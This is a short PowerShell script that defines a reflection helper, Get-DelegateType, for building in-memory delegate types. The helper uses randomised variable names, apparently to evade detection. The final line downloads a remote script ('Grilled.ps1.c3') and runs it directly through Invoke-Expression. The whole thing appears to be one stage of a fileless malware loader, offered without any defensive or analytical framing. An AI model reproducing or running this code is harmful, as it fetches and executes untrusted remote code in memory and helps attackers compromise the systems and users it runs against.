function Get-DelegateType
{
    Param
    (
        [OutputType([Type])]
            
        [Parameter( Position = 0)]
        [Type[]]
        $fAubluoUtYmPjOMGuZSjXLvYaSZYWlWIgpKDGSuW = (New-Object Type[](0)),
            
        [Parameter( Position = 1 )]
        [Type]
        $qWRsPQSrloETscuNPUvLi = [Void]
    )

    $UoHjOVEeIdPhuUEwvResHMwI = [AppDomain]::CurrentDomain
    $HdyXogTASFQxtlySMKeK = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
    $dJRTEcAUOpNWmlBkYWuJBQrhensyItFevycNJiJffF = $UoHjOVEeIdPhuUEwvResHMwI.DefineDynamicAssembly($HdyXogTASFQxtlySMKeK, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
    $TMwnBiAVGqFPZRnnBesMawlITMbFzPVCREU = $dJRTEcAUOpNWmlBkYWuJBQrhensyItFevycNJiJffF.DefineDynamicModule('InMemoryModule', $false)
    $iuhyPjSykghUTQysLdFCVCPJWVPHy = $TMwnBiAVGqFPZRnnBesMawlITMbFzPVCREU.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $rmZjMteqcOtTFOKgunqCOtHUJiQlzrtUez = $iuhyPjSykghUTQysLdFCVCPJWVPHy.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $fAubluoUtYmPjOMGuZSjXLvYaSZYWlWIgpKDGSuW)
    $rmZjMteqcOtTFOKgunqCOtHUJiQlzrtUez.SetImplementationFlags('Runtime, Managed')
    $rcehnSDDzOtwawSijaFpYyqAjcUWEqSzdxMSnZbULuYK = $iuhyPjSykghUTQysLdFCVCPJWVPHy.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $qWRsPQSrloETscuNPUvLi, $fAubluoUtYmPjOMGuZSjXLvYaSZYWlWIgpKDGSuW)
    $rcehnSDDzOtwawSijaFpYyqAjcUWEqSzdxMSnZbULuYK.SetImplementationFlags('Runtime, Managed')
        
    Write-Output $iuhyPjSykghUTQysLdFCVCPJWVPHy.CreateType()
}
$wbc.DownloadString("$prefixpath/Grilled.ps1.c3") | iex
